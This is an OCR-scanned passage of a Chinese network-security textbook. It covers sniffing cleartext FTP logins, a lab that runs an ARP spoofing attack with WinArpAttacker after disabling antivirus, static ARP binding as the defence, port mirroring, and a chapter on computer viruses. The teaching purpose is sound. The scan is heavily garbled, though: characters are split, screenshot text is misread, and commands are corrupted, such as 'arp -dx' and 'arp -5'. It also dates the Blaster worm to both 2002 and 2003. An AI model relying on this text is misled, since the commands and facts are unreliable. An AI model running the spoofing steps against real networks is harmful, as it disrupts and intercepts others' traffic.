( 教 件 由 -高 显 营 -修改 汉化 ) -以 太 网 ( 线 速 度 在 100 mps) 攻占 |] 攻 | 


图 3-19 Sniffer 程序 主 界面 


进行 流量 捕获 之 前 首先 要 选择 正确 的 网 络 适配器 .选择 正确 的 网 络 适配器 后 才能 正常 
工作 。 

步骤 2: 选择 “文件 ”>“ 选 定 设置 "命令 .打开 “当前 设置 ”对话 框 .如 图 3-20 所 示 , 选 择 
正确 的 网 络 适配器 后 . 单 击 “ 确 定 ” 按 钮 .返回 Sniffer 程序 主 界面 。 

步骤 3: 新 建 一 个 过 滤器 。 选 择 “ 捕 获 ” 一 “定义 过 滤器 "命令 .打开 “定义 过 滤器 -捕获 ” 
对 话 框 , 单 击 " 配 置 文件 ”按钮 ,打开 “捕获 配置 文件 ”对 话 框 , 单 击 “ 新 建 " 按 钮 .打开 “新 建 捕 
获 配 置 文件 ”对 话 框 ,在 “新 配置 文件 名 ”文本 框 中 输入 ftp_test, 如 图 3-21 所 示 。 
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图 3-20 “当前 设置 "对 话 框 图 3-21 “新 建 捕获 配置 文件 ”对 话 框 


步骤 4: 单 击 “好 ”按钮 ,返回 “捕获 配置 文件 ”对 话 框 ,再 单 击 “ 完 成 ”按钮 ,返回 “定义 过 
滤器 -捕获 ”对 话 框 ,在 “高 级 "选项 卡 中 ,展开 IP 一 TCP 选项 ,并 选中 FTP 复 选 框 ,如 
图 3-22 所 示 , 单 击 “ 确 定 ” 按 钮 。 然 后 单 击 工具 栏 中 的 捕获 “开始 ”按钮 ,开始 捕获 数据 包 。 

步骤 5: 在 主机 A 中 ,利用 DOS 命令 方式 登录 主机 B 的 FTP 服务 器 。 在 DOS 命令 提示 
符 窗口 中 ,输入 ftp 192. 168. 1. 12 命令 ,然后 输入 FTP 用 户 名 (如 abc) 及 密码 (如 123456) ,进入 
FTP 服务 器 ,如 图 3-23 所 示 。 此 时 ,Sniffer 正在 对 此 次 活动 进行 记录 和 捕 包 。 


扩 要 “| 地 址 “| 数 逢 式 离 攻 | 中 | 


图 3-22 “定义 过 滤器 -捕获 ”对 话 框 (1) 图 3-23 用 DOS 方式 登录 主机 B 的 FTP 服务 器 


步骤 6: 在 主机 C 中 ,从 捕获 界面 中 可 以 看 到 捕获 数据 包 已 达到 一 定数 量 ,此 时 可 单 击 
工具 栏 中 的 捕获 “停止 和 显示 ”按钮 竹 , 停 止 捕 获 。 单 击 窗口 左下 角 的 “解码 ”选项 卡 , 窗 口中 
会 显示 捕获 到 的 数据 包 , 并 分 析 捕 获 的 数据 包 , 如 图 3-24 所 示 。 

从 该 图 可 看 到 通信 双方 的 IP 地 址 和 开启 的 端口 号 等 信息 ,数据 包 1、3、5 是 主机 A 和 
主机 B 的 TCP 的 “三 次 握手 ”。 数 据 包 1 显示 主机 A 向 服务 器 B 发 出 了 FTP 连接 请 求 , 数 
据 中 包含 了 SYN( 建 立 联机 ) ,数据 包 3 是 服务 器 B 向 主机 A 发 送 的 应 答 , 数 据 中 包含 了 
SYN 和 ACK( 确 认 ) ,此 时 .TCP 已 经 完成 了 两 次 握手 。 数 据 包 5 显示 了 第 三 次 握手 ,数据 
中 包含 了 ACK ,从 而 完成 了 TCP 连接 。 

数据 包 6 是 主机 A 向 服务 器 B 发 送 的 账号 数据 ,其 中 的 USER abec 代表 此 用 户 名 为 
abc。 数 据 包 9 是 主机 A 向 服务 器 B 发 送 的 密码 数据 ,其 中 的 PASS 123456 代表 该 用 户 的 
密码 为 123456。 这 正 说 明了 FTP 中 的 数据 是 以 明文 形式 传输 的 ,在 捕获 的 数据 包 中 可 以 
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Sniffer Portable - Local， (软件 由 -高 显 尘 -人 改 汉化 ) -以 太 阿 续 于 度 在 100 Wops) 一 [Snif1: --- 
题 文件 中 ”央视 器 如 捕获 C) 显示 加) 工具 CD) 煞 据 库 @) 窗口 四 帮助 0D 
sl sl lm| Kl| we 本 


[192.168 
[192.168 
[192.168 


required for abc 
479 VIN=65476. 


svord 
ACK=3877722 


| 
[192.169 32 169 1 8 
【192 168 -1 ssx_abc logged in 
L a2 168 1 11] | ACK=3877722498 UIN=65451 


Initial sequence nunber = 3922411827 E33 


Next expected Seq nuaber 3822411828 

Data offset = 28 bytes 

Reserved Bits: Reserved for Future Use (Not shown in the Hex Dunp) 
= 02 


图 3-24 数据 包 解 码 


分 析 到 被 监听 主机 的 任何 行为 。 


3.4.2 任务 2:ARP 欺骗 攻击 与 防范 


1. 任务 目标 


(1) 理解 ARP 欺骗 攻击 的 原理 。 
(2) 掌握 Sniffer 软件 的 使 用 方法 。 
(3) 了 解 ARP 欺骗 攻击 的 防范 方法 。 


2. 任务 内 容 


(1) 配置 捕获 数据 过 滤器 。 
(2) 模拟 ARP 欺骗 攻击 。 
(3) ARP 数据 包 解码 。 

(4) ARP 欺骗 攻击 的 防范 。 


3. 完成 任务 所 需 的 设备 和 软件 


(1) 装 有 Windows XP/2003 操作 系统 的 PC 3 台 . 至 少 其 中 1 台 已 安装 Sniffer 软件 。 


(2) 路 由 器 1 台 , 作 为 访问 外 网 的 网 关 (192. 168. 1. 254) 。 
(3) 集线器 HUB 1 台 , 作 为 网 络 连 接 设 备 ,直通 线 若干 根 。 
(4) ARP 欺骗 攻击 软件 WinArpAttacker 1 套 。 

图 络 拓扑 如 图 3-12 所 示 。 
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4. 任务 实施 步骤 


在 主机 A(192.168. 1.11) 上 运行 WinArpAttacker 程序 ,模拟 ARP 欺骗 攻击 ,人 为 制 
造 网 络 故障 ,致使 局 域 网 中 的 主机 B(192. 168. 1. 12) 和 主机 C(192. 168. 1. 13) 不 能 进行 外 
网 访问 (无 法 与 网 关 通 信 ) 。 

(1) 配置 捕获 数据 过 滤器 

在 默认 情况 下 ,Sniffer Pro 会 接收 网 络 中 传输 的 所 有 数据 包 。 但 在 分 析 网 络 协议 查找 
网 络 故 障 时 ,有 许多 数据 包 不 是 我 们 所 需要 的 ,这 就 要 对 捕获 的 数据 包 进 行 过 滤 , 只 接收 与 
分 析 问 题 或 事件 有 关 的 数据 包 。Sniffer Pro 提供 了 捕获 数据 包 前 的 过 滤 规 则 和 定义 ,过 滤 
规则 包括 第 二 ,第 三 层 地 址 的 定义 和 几 百 种 协议 的 定义 。 

步骤 1: 在 主机 C( 或 主机 B) 中 运行 Sniffer Pro 程序 ,在 打开 的 Sniffer Pro 主 窗 口中 ， 
选择 菜单 “捕获 ”一 “定义 过 滤器 ”命令 ,打开 “定义 过 滤器 -捕获 ”对 话 框 , 单 击 “ 配 置 文件 ” 按 
钮 ,打开 “捕获 配置 文件 ”对 话 框 , 单 击 “ 新 建 "按钮 ,打开 “新 建 捕获 配置 文件 ”对 话 框 ,在 “新 
配置 文件 名 ”文本 框 中 输入 arp_test。 

步骤 2: 单 击 * 好 ”按钮 ,返回 “捕获 配置 文件 "对话 框 ,再 单 击 “ 完 成 "按钮 ,返回 “定义 过 
滤器 -捕获 ”对 话 框 ,在 “高 级 ”选项 卡 中 ,选中 ARP 复 选 框 ,如 图 3-25 所 示 , 单 击 “ 确 定 ” 按 
钮 。 然 后 单 击 工 具 栏 中 的 捕获 “开始 ”按钮 ,开始 捕获 ARP 数据 包 。 


定义 过 涉 器 -加 区 
摘要 | 地 址 | 数据 模式 高 组 | 鲁 冲 | 


日 门 本 可 用 到 的 雹 议 
DF 3con TCP-IPLOOP 


图 3-25 “定义 过 滤器 -捕获 "对话 框 (2) 


(2) 模拟 ARP 欺骗 攻击 

步骤 1: 在 主机 A 上 先 关 闭 防 病毒 软件 ,然后 安装 并 运行 WinArpAttacker 程序 ,打开 
WinArpAttacker 窗口 ,选择 菜单 Scan 一 Advanced 命令 ,然后 在 打开 的 Scan 对 话 框 中 对 IP 
地 址 范围 192. 168. 1. 1 一 192. 168. 1. 254 进行 扫描 ,如 图 3-26 所 示 , 扫描 结 果 如 
图 3-27 所 示 。 

步骤 2: 选中 要 进行 欺骗 攻击 的 目的 主机 .这 里 选择 主机 B(192. 168. 1.12) 和 主机 C 
(192. 168. 1. 13) ,然后 选择 Attack 一 BanGateway 命令 ,开始 对 主机 B 和 主机 C 进行 ARP 
欺骗 攻击 。 
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Untitled - WinArpAttacker 3.5 2006.6.4 
Eile Scan Attsck Detect Options Vier Jelp 


避 民 此 台 


I Conflict 


| See le ms SnigE gaterar 
SnifE Wests 


Jae 


[ce es 
192. 168-1 254 192 168 1 12 00-00| 
192 168-1-11 192 168. 1 13 00-0d| 
192 168. 1.12 192. 168 1 254 。 D6-5 


| FF Werea seo tatingE se 


图 3-26 ”Scan 对 话 框 图 3-27 利用 ARP 欺骗 攻击 器 实施 攻击 


(3) ARP 数据 包 解码 

步骤 1: 在 主机 C( 或 主机 B) 中 ,发 现 Sniffer Pro 已 经 捕获 到 ARP 数据 包 了 (停止 和 
显示 ”按钮 网 的 颜色 由 灰色 变 成 黑色 ) , 单 击 * 停 止 和 显示 ”按钮 网 ,停止 捕获 并 显示 捕获 到 的 
数据 包 , 如 图 3-28 和 图 3-29 所 示 , 其 中 有 4 个 ARP 数据 包 , 序 号 为 1 和 2 的 数据 包 显示 了 
对 192. 168.1.12( 主 机 B) 的 欺骗 攻击 过 程 ,序号 为 3 和 4 的 数据 包 显示 了 对 192. 168. 1. 13 
(主机 C) 的 欺骗 攻击 过 程 。 下 面 介 绍 对 主机 C 的 ARP 欺骗 攻击 过 程 和 结 


可 


D4CIDBIT 
000C294BF9CS 

Mp, KEATSIT TC0 1 13] HA*O101 

OF: DLC semo oarwst mecaat 

ARP: R PA*[132 168.1.254] HA*010101010101 


Frane 3 arrived at 09:11.09. 2140; frene size is 60 (003C hex) bytes. 固 


Destination ~ Station D95D4C3DB11C - 
CCECHY 一 伪 壕 的 源 MAC 地 址 


Hardvare type 。 1 (10Mb Ethernet) 
Protocol type ~ 0800 (IP) 

Length of hardvare address ~ 6 bytes 
Length of protocol address = 4 bytes 
Opcode 2 (ARP reply) 

Sender's hardvare address = 010101010101 


Sender's protocol address ~ [192.168 1.13] 
Target hardvare address = D85D4C3DBL1C 
Target protocol address = [192.168 1.254] 


18 bytes frane padding 


图 3-28 欺骗 网 关 的 ARP 数据 包 


ARP 欺骗 攻击 的 过 程 是 :主机 A 用 伪造 的 源 MAC 地 址 (010101010101) 给 网 关 (IP 地 
址 为 192. 168. 1. 254) 发 送 了 一 个 ARP 数据 包 , 欺 骗 网 关 , 使 网 关 误 认为 主机 C 的 IP 地 址 
是 192. 168. 1. 13 ,对 应 的 MAC 地 址 为 010101010101( 实 际 并 不 存在 )。 同 样 ,主机 A 用 伪 


79 


网 络 安全 技术 项 目 化 教程 


造 的 源 MAC 地 址 (010101010101) 给 主机 C 发 送 了 一 个 ARP 数据 包 , 欺 骗 主机 C, 使 主机 
C 误 认为 网 关 的 IP 地 址 是 192. 168. 1. 254 ,对 应 的 MAC 地 址 为 010101010101 。 

ARP 欺骗 攻击 的 结果 是 :网 关 发 送 给 主机 C( 或 主机 B) 的 数据 发 到 了 MAC 为 
010101010101 的 主机 (该 主机 实际 并 不 存在 ) .主机 C( 或 主机 B) 发 送 给 网 关 的 数据 也 发 到 
了 MAC 为 010101010101 的 主机 ,这 就 是 典型 的 "中间人 ”欺骗 攻击 ,从 而 使 得 主机 C( 或 主 
机 B) 与 网 关 之 间 的 通信 被 阻 断 。 


四 Saiflz 解码 。474 以 本 网 


T0107 | Pas D611 — eter 
Me. R Ph-[132 168 1.12] BA<010101010101 
010101010101 。 | 000c294BF9C5 


010101010101 。 | pe5D4C3DBI1C 
NRE, REAS[192 ES 1 13] HA。olololol0101 
|010101010101 000C29352BBS YF:DLC amperersr 
ARP: R PA*[192.168.1.254] HA*010101010101| 


> 


Frane 4 arrived at 0911 00 2340, frone size 15 60 (003C hex) bytes” 因 


— ARP/RARP frane 一 -一 


Hardvare type * 1 (10Mb Ethernet) 
Protocol type * 0800 (IP) 

Length of hardvare address 。6 bytes 
Length of protocol address » 4 bytes 
Opcode 2 (ARP reply) 

Sender's hardvare address 。 010101010101 
Sender's protocol address » [192.168.1.254] 
Target hardware address  » 000C29352BBS 
Target protocol address = [192 168 .1.13] 


18 bytes trane padding 


[000000 00 oc 29 35 2b bs UU 0 05 00 0 
名 


图 3-29 欺骗 主机 C 的 ARP 数据 包 


步骤 2: 在 主机 C( 或 主机 B) 中 ,执行 arp -a 命令 , 乡 
MAC 地 址 确实 被 欺骗 为 010101010101, 类 型 为 “动态 (dynamic)”,“ 动 态 ” 说 明 
地 址 是 通过 ARP 协议 数据 包 获 取 的 动态 信息 。 


,结果 如 图 3-30 所 示 , 可 见 , 网 关 的 
这 个 MAC 


NDOWS\system32\ 


图 3-30 arp-a 命令 执行 结果 


(4) ARP 欺骗 攻击 的 防范 

针对 ARP 的 欺骗 攻击 ,比较 有 效 的 防范 方法 就 是 将 IP 地 址 与 MAC 地 址 进行 静态 
绑 定 。 

步骤 1: 在 主机 C( 或 主机 B) 中 .执行 以 下 命令 : 
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arp -dx 
arp -5 192.168.1,.254 00 一 23 一 CD 一 76 一 王 一 B0 
arp -a 


其 中 ,arp -d * 命令 用 于 清空 arp 缓存 表 .arp -s 192. 168. 1. 254 00-23-CD-76-FE-B0 
命令 则 是 将 网 关 IP 地 址 192. 168. 1. 254 与 其 相应 的 MAC 地 址 00-23-CD-76-FE-B0 进行 了 
静态 绑 定 ,arp -a 命令 用 于 显示 静态 绑 定 后 的 arp 缓存 3-31 所 示 


巴 | 


Gx18883 
Physical Addre 
81-81-81-81-81-81 


54 D8-5D-4C-3D-B1-1C 


图 3-31 将 IP 地 址 与 MAC 地 址 进行 静态 


步骤 2: 在 主机 A 中 停止 ARP 欺骗 攻击 ,再 重新 开始 一 次 相同 的 欺骗 攻击 。 在 主机 C 
(或 主机 B) 中 再 次 执行 arp -a 命令 ,查看 192. 168. 1. 254 的 MAC 地 址 是 否 再 次 受到 ARP 
欺骗 攻击 而 改变 。 

如 图 3-32 所 示 , 当 IP 地 址 与 MAC 地 址 的 对 应 类 型 被 静态 (Static) 绑 定 后 ,将 不 被 外 界 
的 ARP 欺骗 数据 包 所 改变 。 

步骤 3: 同 理 , 可 在 网 关 ( 一 般 是 路 由 器 ) 中 对 局 域 网 内 的 主机 IP 地 址 与 其 相应 MAC 
地 址 进行 静态 绑 定 ,防止 ARP 欺骗 攻击 


Bx18983 
Physical Addre 
81-81-81-81-81-81 


pg-_5D-4C-3D-B1-1C 


Bx1888: 
ical fd 
a-4c-3d 


图 3-32 ”静态 绑 定 并 再 次 实施 ARP 欺骗 后 的 ARP 缓存 表 
81 


网 络 安全 技术 项 目 化 教程 


35 拓展 提高 : 端口 镜像 


在 由 集线器 HUB 组 建 的 局 域 网 中 ,由 于 集线器 HUB 的 工作 机 理 是 广播 ,因此 只 要 把 
主机 网 卡 设置 成 混杂 模式 ,就 可 监听 到 集线器 任何 接口 上 传输 的 数据 。 但 现在 的 网 络 基本 
上 都 采用 交换 机 ,由 于 交换 机 采用 交换 的 工作 方式 ,只 有 发 出 请 求 的 端口 和 目的 端口 之 间 互 
相 转 发 数据 ,并 不 向 其 他 端口 进行 广播 (只 有 当 MAC 地 址 表 中 无 相应 条 目 时 才 进 行 广播 )， 
所 以 必须 把 执行 网 络 监听 的 主机 接 在 镜像 端口 上 ,才能 监听 到 被 镜像 的 端口 上 的 网 络 信息 。 

端口 镜像 就 是 将 一 个 或 多 个 源 端口 的 数据 流量 完全 复制 到 另 一 个 目的 端口 上 ,以 便 进 
行 网 络 监控 和 分 析 。 

(1) 思科 2950 系列 交换 机 的 端口 镜像 命令 的 使 用 方法 如 下 : 


monitor session 1 source interface f0/2, £0/3 both 

monitor session 1 destination interface f0/1 

上 述 两 条 命令 的 含义 是 :把 端口 {0/2 和 fo/3 流入 和 流出 的 数据 复制 一 份 到 端口 {0/1， 
这 样 连接 在 端口 {0/1 上 的 Sniffer 主机 就 可 以 获得 端口 {0/2 和 {0/3 上 的 数据 了 。 

(2) 华为 / 华 三 上 日 前 主流 交换 机 的 端口 镜像 命令 的 使 用 方法 如 下 : 

monitor-port e0/1 both 

mirroring-port e0/2,e0/3 

上 述 两 条 命令 的 含义 是 :把 端口 e0/2 和 e0/3 流入 和 流出 的 数据 复制 一 份 到 端口 e0/1。 

(3) 锐 捷 交换 机 和 神州 数码 交换 机 的 端口 镜像 命令 的 使 用 方法 与 思科 2950 系列 交换 
机 类 似 。 


1 题 

一 、 选 择 题 
1. TCP 和 UDP 属于 协议 。 

A. 网 络 层 B. 数据 链 路 层 C. 传输 层 D. 以 上 都 不 是 
2. ARP 属于 协议 。 

A. 网 络 层 B. 数据 链 路 层 C. 传输 层 D. 以 上 都 不 是 
3. TCP 连接 的 建立 需要 次 握手 才能 实现 。 

pW B. 2 CC D. 4 
4. ICMP 报 文 是 被 封装 在 中 而 传输 的 。 

A. IP 数据 报 B. TCP 数据 报 C. UDP 数据 报 。” D. 以 上 都 不 是 
5. 网 卡 的 接收 方式 有 。 (多 选 题 ) 

A. 广播 方式 B. 组 播 方式 C. 直接 方式 D. 混杂 方式 
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二 、 简 答题 


. 请 画 出 以 太 网 数据 帧 的 格式 。 

. 请 画 出 ARP 数据 报 的 格式 。 

. 网 络 层 的 传输 协议 有 哪些 ? 

TCP 协议 和 UDP 协议 有 何 区 别 ? 
ICMP 报 文 有 何 作用 ? 

. 简 述 ARP 中 间 人 攻击 的 原理 。 


三 、 操 作 练 习题 


D on ho 


. 使 用 Sniffer 软件 捕捉 IP 协议 的 数据 包 , 并 与 IP 协议 的 格式 进行 对 比分 析 。 

. 使 用 Sniffer 软件 捕捉 ARP 协议 的 数据 包 , 并 与 ARP 协议 的 格式 进行 对 比分 析 。 
. 使 用 Sniffer 软件 捕捉 TCP 协议 的 数据 包 , 并 与 TCP 协议 的 格式 进行 对 比分 析 。 
. 使 用 Sniffer 软件 捕捉 UDP 协议 的 数据 包 ,并 与 UDP 协议 的 格式 进行 对 比分 析 。 


.使 用 Sniffer 软件 捕捉 Telnet 会 话 过 程 ,并 验证 登录 用 户 名 和 密码 是 否 明 文 传输 。 


.使 用 Sniffer 软件 捕捉 HTTP 访问 。 
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41 项 目 提 出 


有 一 天 ,小 李 在 QQ 聊天 时 , 收 到 一 位 网 友 发 来 的 信息 ,如 图 4-1 所 示 , 出 于 好 奇 和 对 网 
友 的 信任 ,小 李 打 开 了 网 友 提供 的 超 链接 ,此 时 突然 弹出 一 个 无 法 关闭 的 窗口 ,提示 系统 即 
将 在 一 分 钟 以 后 关机 ,并 进入 一 分 钟 倒计时 状态 ,如 图 4-2 所 示 。 

小 李 惊 呼 上 当 受 骗 ,那么 小 李 的 计算 机 究竟 怎么 了 ? 


9 近 入 小 刀 ， 这 机 天 我 着 别 的 事情 
机 怎 么 上 网 
天 一 上 网 朋友 | 


me 

yd LT - 尊 疾 和 和 
小 刀 ， 不 会 是 从 PE? 于 滨 担 也 太 需 骨 了 一 | > mem = @ 和 和 
各 吧 ? 希望 不是 你 。 你 看 看 吧 1 Da WT AUTHORITY\SYTSTEN 


不 是 你 。 
单 击 面 地 址 可 以 下 载 
训 关 机 还 有 : 00;00;38 


> gee 消息 
TT a 
ee 


图 4-1 QQ 聊天 窗口 图 4-2 系统 在 一 分 钟 以 后 关机 
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小 李 的 计算 机 中 了 冲击 波 (Worm. Blaster) 病 毒 。2002 年 8 月 12 日 ,冲击 波 病毒 导致 
全 球 范围 内 数 以 亿 计 的 计算 机 中 毒 ,所 带 来 的 直接 经 济 损失 达 数 十 亿美 元 。 病 毒 运行 时 会 
不 停 地 利用 IP 扫描 技术 寻找 网 络 上 系统 为 Windows 2000/XP 的 计算 机 .找到 后 就 利用 
RPC 缓冲 区 漏洞 攻击 该 系统 ,一 旦 攻击 成 功 ,病毒 体 将 会 被 传送 到 对 方 计算 机 中 进行 感染 。 
使 系统 操作 异常 .不 停 重新 启动 .甚至 导致 系统 崩溃 。 另 外 ,该 病毒 还 会 对 Microsoft 的 一 
个 升级 网 站 进行 拒绝 服务 攻击 .导致 该 网 站 堵塞 ,使 用 户 无 法 通过 该 网 站 升级 系统 。 

病毒 手动 清除 方法 :用 DOS 系统 启动 盘 启 动 进 入 DOS 环境 下 ,删除 “C:\Windows\ 
msblast. exe” 文 件 ; 也 可 在 安全 模式 下 删除 该 文件 。 预 防 方法 :打上 RPC 漏洞 安全 补丁 。 


项 目 4 计算 机 病毒 及 防治 


在 Internet 技术 快速 发 展 的 今天 ,由 于 Internet 固有 的 缺陷 ,网 络 安全 问题 日 益 突出 ， 
互联 网 上 陷阱 重重 ,危机 四 伏 ,病毒 木马 、 流 谍 软 件 、 菜 鸟 黑客 为 祸 甚 深 , 稍 不 留神 就 会 中 
招 一 一 系统 瘫痪 、 账 号 被 盗 , 令 人 欲 器 无 泪 。 

据 北 京 江 民 新 科技 术 有 限 公司 统计 ,2011 年 上 半年 最 为 活跃 的 病毒 类 型 首先 为 木马 病 
毒 ,其 共 占 据 所 有 病毒 数量 60% 的 比例 。 其 次 分 别 为 蠕虫 病毒 和 后 门 病毒 。 这 三 种 类 型 的 
病毒 共 占 据 所 有 病毒 数量 83% 的 比例 ,如 图 4-3 所 示 中 ,可 见 日前 网 民 面临 的 首要 威胁 仍旧 
来 自 这 三 种 传统 的 病毒 类 型 。 


2011 年 上 半年 主要 传播 的 病毒 类 型 


日 其 他 13% 
里 广告 软件 2% 


口 漏洞 病毒 2% 器 木 马 60% 
斩 门 8% 


日 蠕虫 15% 


图 4-3 2011 年 上 半年 主要 传播 的 病毒 类 型 


防范 计算 机 病毒 等 的 有 效 方 法 是 除了 及 时 打上 各 种 安全 补丁 外 ,还 应 安装 反 病毒 工具 ， 
并 进行 合理 设置 ,比较 常见 的 工具 有 360 杀毒 软件 .360 安全 卫士 等 。 


43 相关 知识 点 


4.3.1 计算 机 病毒 的 概念 


1. 计算 机 病毒 的 定义 


计算 机 病毒 在 (中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 例 ) 中 被 明确 定义 ,病毒 是 
指 “ 编 制 者 在 计算 机 程序 中 插入 的 破坏 计算 机 功能 或 者 破坏 数据 ,影响 计算 机 使 用 并 且 能 够 
自我 复制 的 一 组 计算 机 指令 或 者 程序 代码 ”。 

与 医学 上 的 “病毒 ”不同 .计算 机 病毒 不 是 天 然 存 在 的 ,是 某 些 人 利用 计算 机 软件 和 硬件 
所 固有 的 脆弱 性 编制 的 一 组 指令 集 或 程序 代码 。 它 能 通过 某 种 途径 潜伏 在 计算 机 的 存储 介 
质 ( 或 程序 ) 里 , 当 达 到 某 种 条 件 时 即 被 激活 .通过 修改 其 他 程序 的 方法 将 自己 的 精确 复制 或 
者 可 能 演化 的 形式 放 入 其 他 程序 中 ,从 而 感染 其 他 程序 ,对 计算 机 资源 进行 破坏 。 


中 ”来自 北京 江 民 新 科技 术 有 限 公司 2011 年 上 半年 网 络 安全 信息 报告 。 
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2. 计算 机 病毒 的 产生 与 发 展 


随 着 计算 机 应 用 的 普及 ,早期 就 有 一 些 科 普 作 家 意识 到 可 能 会 有 人 利用 计算 机 进行 破 
坏 , 提 出 了 “计算 机 病毒 ”这 个 概念 。 不 久 , 计 算 机 病毒 便 在 理论 ,程序 上 都 得 到 了 证 实 。 

1949 年 ,计算 机 的 创始 人 汉 “。 诺 依 曼 发 表 《 复 杂 自 动 装置 的 理论 及 组 织 的 进行 》 的 论 
文 ,提出 了 计算 机 程序 可 以 在 内 存 中 进行 自我 复制 和 变异 的 理论 。 

1959 年 ,美国 著名 的 AT &. 工 贝 尔 实验 室 中 ,三 个 年 轻 人 在 工作 之 余 , 很 无 聊 地 玩 起 一 
种 游戏 : 彼此 撰写 出 能 够 吃 掉 别人 程序 的 程序 来 互相 作战 。 这 个 叫做 “ 磁 芯 大 战 ”(core 
war) 的 游戏 ,进一步 将 计算 机 病毒 “感染 性 ”的 概念 体现 出 来 。 

1975 年 ,美国 科普 作家 约翰 。 布 鲁 勒 尔 写 了 一 本 名 为 (震荡 波 骑 士 ) 的 书 , 该 书 第 一 次 
描写 了 在 信息 社会 中 ,计算 机 作为 正义 和 收 恶 双方 斗争 的 工具 的 故事 ,成 为 当年 最 佳 畅 销 书 
二 二 

1977 年 夏天 ,托马斯 捷 ， 瑞安 的 科幻 小 说 (P-1 的 青春 成 为 美国 的 畅销 书 , 友 动 了 科 
普 界 。 作 者 幻想 了 世界 上 第 一 个 计算 机 病毒 ,可 以 从 一 台 计 算 机 传染 到 另 一 台 计 算 机 ,最终 
控制 了 7000 台 计 算 机 , 酿 成 了 一 场 灾难 。 

1983 年 ,Fred Cohen 博士 研制 出 一 种 在 运行 过 程 中 可 以 复制 自身 的 破坏 性 程序 ,并 在 
全 美 计算 机 安全 会 议 上 提出 和 在 VAXIV/150 机 上 演示 ,从 而 证 实 计 算 机 病毒 的 存在 ,这 也 
是 公认 的 第 一 个 计算 机 病毒 程序 的 出 现 。 

世界 上 公认 的 第 一 个 在 个 人 计算 机 上 广泛 流行 的 病毒 是 1986 年 年 初 诞生 的 大 脑 
(Brain) 病 毒 ,又 称 “ 巴 基 斯 坦 ” 病 毒 。 

1988 年 ,罗伯特 莫 里 斯 (Robert Morris) 制造 的 蠕虫 病毒 是 首 个 通过 网 络 传播 而 震 
撼 世 界 的 “计算 机 病毒 侵入 网 络 的 案件 ”。 

1998 年 ,中 国 台湾 大 学 生 陈 盈 豪 研制 的 迄今 为 止 破坏 性 最 严重 的 病毒 一 一 CIH 病毒 ， 
也 是 世界 上 首 例 破坏 计算 机 硬件 的 病毒 。 它 发 作 时 不 仅 破坏 硬盘 的 引导 区 和 分 区 表 , 而 且 
破坏 计算 机 系统 的 BIOS, 导 致 主板 损坏 。 

1999 年 ,Melissa 是 最 早 通 过 电子 邮件 传播 的 病毒 之 一 , 当 用 户 打开 一 封 电子 邮件 的 附 
件 , 病 毒 会 自动 发 送 到 用 户 通信 德 中 的 前 50 个 地 址 ,因此 这 个 病毒 在 数 小 时 之 内 传 遍 全 球 。 

2003 年 ,冲击 波 病毒 利用 了 Microsoft 软件 中 的 一 个 缺陷 ,对 系统 端口 进行 疯狂 攻击 ， 
可 以 导致 系统 崩溃 。 

2007 年 ,“ 熊 猫 烧 香 ” 病 毒 会 使 所 有 程序 图 标 变 成 熊猫 烧香 ,并 使 它们 不 能 应 用 。 

2009 年 ,木马 下 载 器 病毒 会 产生 1000 一 2000 不 等 的 木马 病毒 ,导致 系统 崩溃 , 短 短 3 天 
变 成 360 安全 卫士 首 杀 榜 前 三 名 。 

2011 年 ,U 盘 寄 生 虫 病毒 利用 自动 播放 特性 激活 自身 ,运行 后 可 执行 下 载 其 他 恶意 程 
序 .感染 存储 设备 根 目录 等 功能 。 

计算 机 病毒 的 主要 发 展 趋势 有 以 下 6 个 方面 。 

@ 网 络 成 为 计算 机 病毒 传播 的 主要 载体 ,局域网 .Web 站 点 .电子 邮件 `.P2P、IM 聊天 
工具 都 成 为 病毒 传播 的 渠道 。 

@ 网 络 蠕虫 成 为 最 主要 和 破坏 力 最 大 的 病毒 类 型 ,此 类 病毒 的 编写 更 加 简单 。 

@ 恶意 网 页 代码 .脚本 及 ActiveX 的 使 用 .使 基于 Web 页 面 的 攻击 成 为 破坏 的 新 类 
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型 。 病 毒 的 传播 方式 以 网 页 挂 马 为 主 。 

@ 出 现 带 有 明显 病毒 特征 的 木马 或 木马 特征 的 病毒 ,病毒 与 黑客 程序 紧密 结合 。 病 毒 
制造 、 传 播 者 在 巨大 利益 的 驱使 下 ,利用 病毒 木马 技术 进行 网 络 盗窃 .诈骗 活动 ,通过 网 络 贩 
卖 病毒 ,木马 ,教授 病毒 编制 技术 和 网 络 攻击 技术 等 形式 的 网 络 犯罪 活动 明显 增多 。 

@ 病毒 自我 防御 能 力 不 断 提高 ,难以 及 时 被 发 现 和 清除 。 此 外 ,病毒 生成 器 的 出 现 和 
使 用 ,使 病毒 变种 更 多 ,难以 清除 。 

@ 跨 操作 系统 平台 病毒 出 现 , 病 毒 作用 范围 不 仅 限于 普通 计算 机 。2000 年 6 月 ,世界 
上 第 一 个 手机 病毒 VBS. Timofonica 在 西班牙 出 现 。 


3. 计算 机 病毒 发 作 的 症状 


很 显然 ,任何 计算 机 病毒 在 发 作 的 时 候 都 不 会 轻易 地 暴露 自己 ,但 是 ,由 于 其 作为 一 种 
特殊 的 程序 及 其 产生 的 破坏 作用 ,必然 会 对 计算 机 或 网 络 系统 产生 一 些 破坏 作用 ,也 就 必然 
产生 一 些 症状 ,常见 的 症状 主要 有 以 下 几 种 。 

@ 计算 机 系统 运行 速度 减 慢 .计算 机 运行 比 平常 迟钝 ,程序 载 人 时 间 比 平常 久 。 

@ 磁盘 出 现 异常 访问 ,在 无 数据 读 / 写 要 求 时 ,系统 自动 频繁 读 / 写 磁盘 。 

@ 屏幕 上 出 现 异常 显示 。 

@ 文件 长 度 .日 期 .时 间 、 属 性 等 发 生变 化 。 

@ 系统 可 用 资源 (如 内 存 ) 容 量 忽然 大 量 减 少 .CPU 利用 率 过 高 。 

@ 系统 内 存 中 增加 一 些 不 熟悉 的 常 驻 程序 ,或 注册 表 启 动 项 目 中 增加 了 一 些 特 殊 
程序 。 

@ 文件 奇怪 地 消失 或 被 修改 ,或 用 户 不 可 以 删除 文件 。 

@ Word 或 Excel 提示 执行 “ 宏 ”。 

加 网 络 主机 信息 与 参数 被 修改 ,不 能 连接 到 网 络 。 用 户 连接 网 络 时 ,莫名 其 妙 地 连接 
到 其 他 站 点 ,一般 钓鱼 网 站 病毒 与 ARP 病毒 会 产生 此 类 现象 。 

四 杀毒 软件 被 自动 关闭 或 不 能 使 用 。 

当然 ,通过 计算 机 杀毒 软件 的 病毒 防火 墙 和 实时 检测 ,用 户 一 般 可 以 发 现 病毒 的 存在 ， 
